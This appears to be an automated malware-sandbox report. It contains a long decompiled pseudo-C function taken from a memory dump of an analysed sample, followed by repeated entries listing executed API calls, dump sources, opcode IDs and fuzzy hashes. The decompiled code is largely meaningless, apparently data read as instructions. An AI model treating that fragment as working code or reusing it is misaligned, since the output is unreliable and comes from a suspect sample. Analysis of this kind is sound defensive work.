                                                				_t414 = _t413 +  *_t402;
                                                				 *((intOrPtr*)(0xfc000800 + _t449)) =  *((intOrPtr*)(0xfc000800 + _t449)) + _t414;
                                                				 *_t359 =  *_t359 + 0xffffffa1;
                                                				_t360 = _t359 & 0x002c057f;
                                                				_push(ds);
                                                				 *_t360 =  *_t360 & _t360;
                                                				 *_t360 =  *_t360 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *0x21e700 =  *0x21e700 + _t414;
                                                				 *_t360 =  *_t360 + 0xd;
                                                				 *((intOrPtr*)(_t402 + 0x3c25cc00)) =  *((intOrPtr*)(_t402 + 0x3c25cc00)) + 0xd;
                                                				_t361 = _t360 + 0x2d;
                                                				_t428 = 0xfc000800 + _t402;
                                                				 *_t361 =  *_t361 & _t361;
                                                				 *_t361 =  *_t361 + 0xd;
                                                				 *((intOrPtr*)(_t414 + 0x6e224718)) =  *((intOrPtr*)(_t414 + 0x6e224718)) + _t428;
                                                				 *_t449 =  *_t449 + _t414;
                                                				 *_t449 =  *_t449 + _t402;
                                                				 *_t361 =  *_t361 & _t361;
                                                				 *_t361 =  *_t361 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *_t449 =  *_t449 + _t414;
                                                				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + _t428;
                                                				 *((intOrPtr*)(_t402 + 0x4e25e800)) =  *((intOrPtr*)(_t402 + 0x4e25e800)) + 0xd;
                                                				_t415 = _t414 +  *_t449;
                                                				 *((intOrPtr*)(_t402 + _t449)) =  *((intOrPtr*)(_t402 + _t449)) + _t361;
                                                				 *_t361 =  *_t361 + 0xd;
                                                				 *_t361 =  *_t361 + 0xd;
                                                				_t362 = _t449;
                                                				_t450 = _t361;
                                                				 *_t362 =  *_t362 + _t415;
                                                				asm("loope 0x8");
                                                				asm("das");
                                                				 *((intOrPtr*)(_t402 + _t450)) =  *((intOrPtr*)(_t402 + _t450)) + _t428;
                                                				_t363 = _t450;
                                                				_t451 = _t362;
                                                				 *_t451 =  *_t451 + _t363;
                                                				_t429 = _t428 - 1;
                                                				_push(es);
                                                				_push(es);
                                                				_t365 = (_t363 ^  *_t363) &  *(_t363 ^  *_t363);
                                                				 *_t365 =  *_t365 + 0xd;
                                                				 *((intOrPtr*)(_t415 + 0x6e224718)) =  *((intOrPtr*)(_t415 + 0x6e224718)) + _t429;
                                                				 *_t441 = _t429 +  *_t441;
                                                				 *_t451 =  *_t451 + _t402;
                                                				 *_t365 =  *_t365 & _t365;
                                                				 *_t365 =  *_t365 + 0xd;
                                                				 *((intOrPtr*)(_t451 - 0x6cf1dae8)) =  *((intOrPtr*)(_t451 - 0x6cf1dae8)) + 0xd;
                                                				 *_t441 = _t429 +  *_t441;
                                                				 *0xfc000800 = _t429 +  *0xfc000800;
                                                				_t366 = _t365 &  *_t365;
                                                				 *_t366 =  *_t366 + 0xd;
                                                				 *((intOrPtr*)(_t402 - 0x7cd9af00)) =  *((intOrPtr*)(_t402 - 0x7cd9af00)) + 0xd;
                                                				_push(es);
                                                				asm("aaa");
                                                				 *((intOrPtr*)(_t470 + _t451)) =  *((intOrPtr*)(_t470 + _t451)) + _t415;
                                                				 *_t366 =  *_t366 + 0xd;
                                                				 *_t366 =  *_t366 + 0xd;
                                                				_t367 = _t451;
                                                				 *((intOrPtr*)(_t466 + 0x3806f826)) =  *((intOrPtr*)(_t466 + 0x3806f826)) + _t415;
                                                				 *((intOrPtr*)(_t367 + 0x35)) =  *((intOrPtr*)(_t367 + 0x35)) + _t402;
                                                				 *_t367 =  *_t367 + 0xd;
                                                				 *_t367 =  *_t367 + 0xd;
                                                				_t368 = _t366;
                                                				_t453 = _t367;
                                                				 *((intOrPtr*)(_t466 + 0x3b075226)) =  *((intOrPtr*)(_t466 + 0x3b075226)) + _t402;
                                                				_t368[0xd] = _t368[0xd] + _t402;
                                                				 *((intOrPtr*)(_t453 - 0x7fd93100)) =  *((intOrPtr*)(_t453 - 0x7fd93100)) + _t429;
                                                				 *0x3be000 =  *0x3be000 | _t441;
                                                				 *_t368 =  *_t368 + 0xd;
                                                				 *((intOrPtr*)(_t453 + 0xd26db00)) =  *((intOrPtr*)(_t453 + 0xd26db00)) + _t429;
                                                				 *_t441 =  *_t441 + _t415;
                                                				_t369 = _t453;
                                                				_t454 = _t368;
                                                				_t404 = (_t402 |  *_t453) + (_t402 |  *_t453);
                                                				 *_t369 =  *_t369 + 0xd;
                                                				 *_t369 =  *_t369 + 0xd;
                                                				_t417 =  *_t369;
                                                				 *_t369 =  *[es:edx] * 0x22150040;
                                                				asm("out dx, eax");
                                                				asm("sbb eax, 0x22");
                                                				 *((intOrPtr*)(_t454 - 0x66d8baf8)) =  *((intOrPtr*)(_t454 - 0x66d8baf8)) + 0xd;
                                                				_t372 = (_t369 | 0x00430072) +  *_t404 &  *[es:eax];
                                                				 *_t372 =  *_t372 + 0xd;
                                                				_t454[0x689d382] = _t454[0x689d382] + 0xd;
                                                				 *((intOrPtr*)(_t372 + _t372 + 0x2e)) =  *((intOrPtr*)(_t372 + _t372 + 0x2e)) + _t372;
                                                				_t373 = _t372 &  *_t372;
                                                				 *_t373 =  *_t373 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x77d8a7f8)) =  *((intOrPtr*)(_t454 - 0x77d8a7f8)) + 0xd;
                                                				_t374 = _t373 |  *(_t373 + _t373 + 0x1e);
                                                				 *_t374 =  *_t374 & _t374;
                                                				 *_t374 =  *_t374 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
                                                				 *_t466 =  *_t466 + 0xd;
                                                				asm("aaa");
                                                				_t375 = _t374 &  *_t374;
                                                				 *_t375 =  *_t375 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x72f1dae8)) =  *((intOrPtr*)(_t454 - 0x72f1dae8)) + 0xd;
                                                				_t376 = _t375 |  *_t466;
                                                				_push(ds);
                                                				 *_t376 =  *_t376 & _t376;
                                                				 *_t376 =  *_t376 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
                                                				 *_t441 =  *_t441 + 0xd;
                                                				_t467 = _t466 - 1;
                                                				_t377 = _t376 &  *_t376;
                                                				 *_t377 =  *_t377 + 0xd;
                                                				 *((intOrPtr*)(_t404 - 0x15ed5a00)) =  *((intOrPtr*)(_t404 - 0x15ed5a00)) + 0xd;
                                                				 *_t441 =  *_t441 | 0x0000000d;
                                                				_push(ds);
                                                				 *_t377 =  *_t377 & _t377;
                                                				 *_t377 =  *_t377 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
                                                				 *_t377 =  *_t377 + _t417;
                                                				asm("pushad");
                                                				_t378 = _t377 &  *_t377;
                                                				 *_t378 =  *_t378 + 0xd;
                                                				 *((intOrPtr*)(_t404 - 0x15ed3700)) =  *((intOrPtr*)(_t404 - 0x15ed3700)) + 0xd;
                                                				 *_t378 =  *_t378 | _t417;
                                                				_push(ds);
                                                				 *_t378 =  *_t378 & _t378;
                                                				 *_t378 =  *_t378 + 0xd;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
                                                				 *_t417 =  *_t417 + _t417;
                                                				_t379 = _t378 ^ 0x0000003f;
                                                				 *_t379 =  *_t379 + 0xd;
                                                				 *_t379 =  *_t379 + 0xd;
                                                				 *_t379 =  *_t379 + 0xffffffe2;
                                                				asm("adc ch, dl");
                                                				 *_t417 =  *_t417 | _t417;
                                                				if( *_t417 == 0) {
                                                					 *_t379 =  *_t379 + 0xd;
                                                					 *_t379 =  *_t379 + 0xd;
                                                					_t265 = _t379;
                                                					_t379 = _t417;
                                                					_t417 = _t265;
                                                					asm("sbb [edi+0x22], al");
                                                					asm("outsb");
                                                					 *0xfc000800 =  *0xfc000800 + _t417;
                                                					_push(ds);
                                                					 *_t379 =  *_t379 & _t379;
                                                					 *_t379 =  *_t379 + 0xd;
                                                					 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
                                                					 *0xfc000800 =  *0xfc000800 + _t417;
                                                					 *0xfc000800 =  *0xfc000800 & 0x00000000;
                                                					 *_t379 =  *_t379 + 0x2f;
                                                				}
                                                				asm("das");
                                                				asm("adc bl, [edx]");
                                                				 *_t429 =  *_t429 | _t417;
                                                				asm("adc ah, [edx]");
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + 0x4c;
                                                				asm("adc bh, [eax]");
                                                				 *_t404 =  *_t404 | _t417;
                                                				 *_t429 = _t470;
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + 0x71;
                                                				asm("adc bh, [ecx+0x8]");
                                                				 *_t429 = _t429 +  *_t429;
                                                				 *_t379 =  *_t379 + 0xffffff8e;
                                                				asm("adc ch, [ebx+0x1e004d08]");
                                                				 *_t379 =  *_t379 & _t379;
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + _t379;
                                                				 *_t454 =  *_t454 + _t417;
                                                				asm("aas");
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + _t379;
                                                				 *_t379 =  *_t379 + 0xffffffec;
                                                				asm("adc ecx, ecx");
                                                				 *_t454 =  *_t454 | _t417;
                                                				asm("pushfd");
                                                				_t380 = _t379 &  *_t379;
                                                				 *_t380 =  *_t380 + _t380;
                                                				 *((intOrPtr*)(_t417 + 0x6e224718)) =  *((intOrPtr*)(_t417 + 0x6e224718)) + _t429;
                                                				 *_t441 =  *_t441 + _t417;
                                                				_push(ds);
                                                				 *_t380 =  *_t380 & _t380;
                                                				 *_t380 =  *_t380 + _t380;
                                                				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + _t380;
                                                				 *_t441 =  *_t441 + _t417;
                                                				 *_t380 =  *_t380 + _t380;
                                                				 *_t380 =  *_t380 + _t380;
                                                				 *_t380 =  *_t380 + 0x26;
                                                				asm("adc al, 0xc9");
                                                				 *_t441 =  *_t441 | _t417;
                                                				asm("int3");
                                                				asm("aas");
                                                				 *_t380 =  *_t380 + _t380;
                                                				 *_t380 =  *_t380 + _t380;
                                                				_t381 = _t454;
                                                				asm("daa");
                                                				 *_t404 =  *_t404 - _t417;
                                                				_push(_t381);
                                                				_t381[0x10] = _t381 + _t381[0x10];
                                                				 *_t381 = _t381 +  *_t381;
                                                				 *_t381 = _t381 +  *_t381;
                                                				_t382 = _t380;
                                                				asm("daa");
                                                				asm("loopne 0x42");
                                                				 *_t382 =  *_t382 + _t382;
                                                				 *_t382 =  *_t382 + _t382;
                                                				_t434 = (_t429 + _t404 + _t404 + 0x00000001 |  *(_t429 + _t404 + _t404 + 1)) + _t404;
                                                				asm("daa");
                                                				 *_t404 = _t417;
                                                				_push(_t467);
                                                				_t384 = _t381 + _t434;
                                                				 *_t384 =  *_t384 + _t384;
                                                				 *_t384 =  *_t384 + _t384;
                                                				_t385 = _t382;
                                                				 *_t434 =  *_t434 + _t385;
                                                				 *((intOrPtr*)(_t441 + 0x800580b)) =  *((intOrPtr*)(_t441 + 0x800580b)) - _t434;
                                                				_t435 = _t434 + 1;
                                                				 *_t385 =  *_t385 + _t385;
                                                				 *_t385 =  *_t385 + _t385;
                                                				_t386 = _t384;
                                                				 *_t435 =  *_t435 + _t386;
                                                				_t420 =  *_t404 + 1 - _t404;
                                                				_t436 = _t435 + 1;
                                                				 *_t386 =  *_t386 + _t386;
                                                				 *_t386 =  *_t386 + _t386;
                                                				_t387 = _t385;
                                                				_t460 = _t386;
                                                				 *((intOrPtr*)(_t436 + 0x28)) =  *((intOrPtr*)(_t436 + 0x28)) + _t420;
                                                				asm("cld");
                                                				_t406 = _t404 |  *(_t386 + _t386 + 0x3c) |  *_t460;
                                                				asm("pushfd");
                                                				 *_t387 =  *_t387 + _t387;
                                                				 *_t387 =  *_t387 + _t387;
                                                				_t438 = _t436 + 1 + _t406;
                                                				asm("daa");
                                                				_t390 = (_t460 | 0x00000060) + _t438;
                                                				_t407 = _t406 + 1;
                                                				 *_t390 =  *_t390 + _t390;
                                                				 *_t390 =  *_t390 + _t390;
                                                				_t391 = _t387;
                                                				 *((intOrPtr*)(_t420 + 0x640c5b28)) =  *((intOrPtr*)(_t420 + 0x640c5b28)) + _t420;
                                                				 *_t391 =  *_t391 + _t391;
                                                				 *_t391 =  *_t391 + _t391;
                                                				 *_t391 =  *_t391 + _t391;
                                                				_t392 = _t390;
                                                				_t463 = _t391;
                                                				 *((intOrPtr*)(_t407 + 0x650c8028)) =  *((intOrPtr*)(_t407 + 0x650c8028)) + _t438;
                                                				 *((intOrPtr*)(_t392 + 0x44)) =  *((intOrPtr*)(_t392 + 0x44)) + _t438;
                                                				 *((intOrPtr*)(_t463 - 0x3ad72700)) =  *((intOrPtr*)(_t463 - 0x3ad72700)) + _t438;
                                                				_t393 = _t392 | 0x00000068;
                                                				 *_t463 =  *_t463 + _t407;
                                                				 *_t393 =  *_t393 & _t393;
                                                				 *_t393 =  *_t393 + _t393;
                                                				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t393;
                                                				 *_t420 =  *_t420 + _t420;
                                                				 *_t393 =  *_t393 + _t393;
                                                				 *_t393 =  *_t393 + _t393;
                                                				 *_t393 =  *_t393 + 0xffffffc3;
                                                				asm("adc al, 0x3c");
                                                				_t394 = _t393 + 0x69;
                                                				 *_t463 =  *_t463 + _t407;
                                                				 *_t394 =  *_t394 & _t394;
                                                				 *_t394 =  *_t394 + _t394;
                                                				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t394;
                                                				 *_t438 =  *_t438 + 0x22;
                                                				return _t394;
                                                			}
                                                0x0109fca9
                                                0x0109fcab
                                                0x0109fcad
                                                0x0109fcb3
                                                0x0109fcb6

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2168159857.0000000001012000.00000020.00020000.sdmp, Offset: 01010000, based on PE: true
                                                • Associated: 00000004.00000002.2168147761.0000000001010000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.2168241836.00000000010AA000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb50c54da0f7a1121957d0ff37c42dfcaf476882d859f20c49d2746b0b1cbb4a
                                                • Instruction ID: f217a4a322388110c49a429e5ba053c54d8f9f2a5b53b96fdc232f5e14023ebb
                                                • Opcode Fuzzy Hash: cb50c54da0f7a1121957d0ff37c42dfcaf476882d859f20c49d2746b0b1cbb4a
                                                • Instruction Fuzzy Hash: 6142FD6154E3D25FD7138B708CB9682BFB0AE1312575E4ADFC0C1CB8E3E258598AD762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 3b56079e18a9607041676a9504b8b3bfb7904042be422d3ead3806f649f701eb
                                                • Instruction ID: fb3163a5503586be63cbb3568acd6664f2bab5a0befc15eaf0bd545245cce35a
                                                • Opcode Fuzzy Hash: 3b56079e18a9607041676a9504b8b3bfb7904042be422d3ead3806f649f701eb
                                                • Instruction Fuzzy Hash: F9A227B4A18228CFCB65DF70C88869DB7B6BF48305F2084EAD54AA7350DB709E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 9b07ca2414bd9914793cbfe5968fc19c9872153e4cb9b22fb956b0d716379fdd
                                                • Instruction ID: 28bd82ae18722b49d2dd2d5cf76a7d34e5236126f3519527af57c0d1e201ebf0
                                                • Opcode Fuzzy Hash: 9b07ca2414bd9914793cbfe5968fc19c9872153e4cb9b22fb956b0d716379fdd
                                                • Instruction Fuzzy Hash: 135239B4A18218CFCB25DF70C9886ACB7B6BF48305F2084EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 6caa6c035182d5ac2717451b66ce4a7acf00481d71e9a62b7a910b021b9a41a1
                                                • Instruction ID: 88870dcc8b561a059c179c06d42bbeade627d566d330a196fd582534dcf1425d
                                                • Opcode Fuzzy Hash: 6caa6c035182d5ac2717451b66ce4a7acf00481d71e9a62b7a910b021b9a41a1
                                                • Instruction Fuzzy Hash: F45239B4A14228CFCB25DF70C9886ACB7B6BF48305F2085EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: afe6281c7cc77a407bdf0a0fa134598ba665b83a9184bb322876a630b96a00bc
                                                • Instruction ID: 9f756d7220714dffec46a3e2022723b442c472af5ee5c9376e94e6fc204a4741
                                                • Opcode Fuzzy Hash: afe6281c7cc77a407bdf0a0fa134598ba665b83a9184bb322876a630b96a00bc
                                                • Instruction Fuzzy Hash: BE5239B4A14218CFCB25DF70C9886ACB7B6BF48305F2085EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 2879abcdf23e6b20c0f14ac3d6cbb8e3f5fcc3f91102abf6cef84bcf4fa626d1
                                                • Instruction ID: 5f7635edfe95c71ca4c1ab26aec5e95bf7b318dbc3aecc1f222aec9e4956ecab
                                                • Opcode Fuzzy Hash: 2879abcdf23e6b20c0f14ac3d6cbb8e3f5fcc3f91102abf6cef84bcf4fa626d1
                                                • Instruction Fuzzy Hash: 915239B4A14218CFCB25DF70C9886ACB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 212e82854538c837cb629f2d9f03d3cfb32bb01a2e1d5d1c7ebf6ce86313cb74
                                                • Instruction ID: c56a5cf1a29a3da372d7ee8d3698482d66ff56594d38b872d9b80495279c7d6f
                                                • Opcode Fuzzy Hash: 212e82854538c837cb629f2d9f03d3cfb32bb01a2e1d5d1c7ebf6ce86313cb74
                                                • Instruction Fuzzy Hash: 895229B4A14228CFCB24DF70C98869CB7B6BF48305F2085EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: dad410d2dcd3a31f3b0d4c04cf0bab7415525e7f7f6b5073da33cbbb0ac8c851
                                                • Instruction ID: c580e940670865620f439faf05f094fd2850b40d260bd56de92676515f1fc642
                                                • Opcode Fuzzy Hash: dad410d2dcd3a31f3b0d4c04cf0bab7415525e7f7f6b5073da33cbbb0ac8c851
                                                • Instruction Fuzzy Hash: 405229B4A14228CFCB24DF70C98869CB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0052C9F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID: lRO
                                                • API String ID: 3660427363-3496118401
                                                • Opcode ID: 222fcabeeae0ec36cc2f7131895261d4726cb7bc95a122067dc97981ada008bd
                                                • Instruction ID: aa26088c2de3a078b493300746ad54333876371e5a78f91c28165be4eeafb9dc
                                                • Opcode Fuzzy Hash: 222fcabeeae0ec36cc2f7131895261d4726cb7bc95a122067dc97981ada008bd
                                                • Instruction Fuzzy Hash: C531E0B1D002689FCB10CF9AD884A9EBFF5BF49340F65852AE818AB351D770A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: e7e7a545ddbc0a7562f112849c7711971642ee893b18bbdccd177a3201ad0ecd
                                                • Instruction ID: 5e24b15fac9938395b338f5d5c28dbd83deff0b7213808770890e4c83ecec305
                                                • Opcode Fuzzy Hash: e7e7a545ddbc0a7562f112849c7711971642ee893b18bbdccd177a3201ad0ecd
                                                • Instruction Fuzzy Hash: E95229B4A14218CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4069aa1651701cc158b2f380ca3c65301c2df9b12feb0626d82ff2e86ef7cc27
                                                • Instruction ID: 01546ac71c004a8cec5ab1c6852491e8cac1bf0d87c2d79a0e537d2c027ac2ba
                                                • Opcode Fuzzy Hash: 4069aa1651701cc158b2f380ca3c65301c2df9b12feb0626d82ff2e86ef7cc27
                                                • Instruction Fuzzy Hash: 8C5229B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4190dc17ab7a4e1a603a2611096ed4ef40f10792b005e5bb9f41d548de554c0b
                                                • Instruction ID: 8d1c2d33f5104ea8bc9d334b3b58fb3be2b65393ae5535af004076f5c061920d
                                                • Opcode Fuzzy Hash: 4190dc17ab7a4e1a603a2611096ed4ef40f10792b005e5bb9f41d548de554c0b
                                                • Instruction Fuzzy Hash: F34228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: a8b69bee3d0fd4024aa3728f21a0796e5bcc813c283548954fdd55492c3d4213
                                                • Instruction ID: 5f88fdffb78ab61e7f6202a74c1796391a46ad9881a4117bb1878aa44d56931c
                                                • Opcode Fuzzy Hash: a8b69bee3d0fd4024aa3728f21a0796e5bcc813c283548954fdd55492c3d4213
                                                • Instruction Fuzzy Hash: 6D4228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 9adeef0b78b6715f0d7dac3701cff03225275d6f7ed47f3640164abbb3f35215
                                                • Instruction ID: 177d3515a563a51f1d92baa13d406472f0d7538ea71924378b14e3c3dc0f2b5e
                                                • Opcode Fuzzy Hash: 9adeef0b78b6715f0d7dac3701cff03225275d6f7ed47f3640164abbb3f35215
                                                • Instruction Fuzzy Hash: CA4228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: d90c68029d9857961c45a767c09136a9df16aa8b6918d33362bd42747b9a781b
                                                • Instruction ID: 8e07334ca0a8aee8f65c46b7283d1b4922198736bafdeeda0429d108b23c86e1
                                                • Opcode Fuzzy Hash: d90c68029d9857961c45a767c09136a9df16aa8b6918d33362bd42747b9a781b
                                                • Instruction Fuzzy Hash: 5E4239B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 089749b097f3e7dba3200e5abf73d83397e7bb8df27958c6ee5208028f7fc911
                                                • Instruction ID: 42123ebc75e3d559f44608d05a580bca02f9d81e060e2ed8fd784cd974f4adc5
                                                • Opcode Fuzzy Hash: 089749b097f3e7dba3200e5abf73d83397e7bb8df27958c6ee5208028f7fc911
                                                • Instruction Fuzzy Hash: 144239B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 0e735046a836fdabd04e941a66ea2e99ffdb6a2cba7407ce8932b1045e62c72b
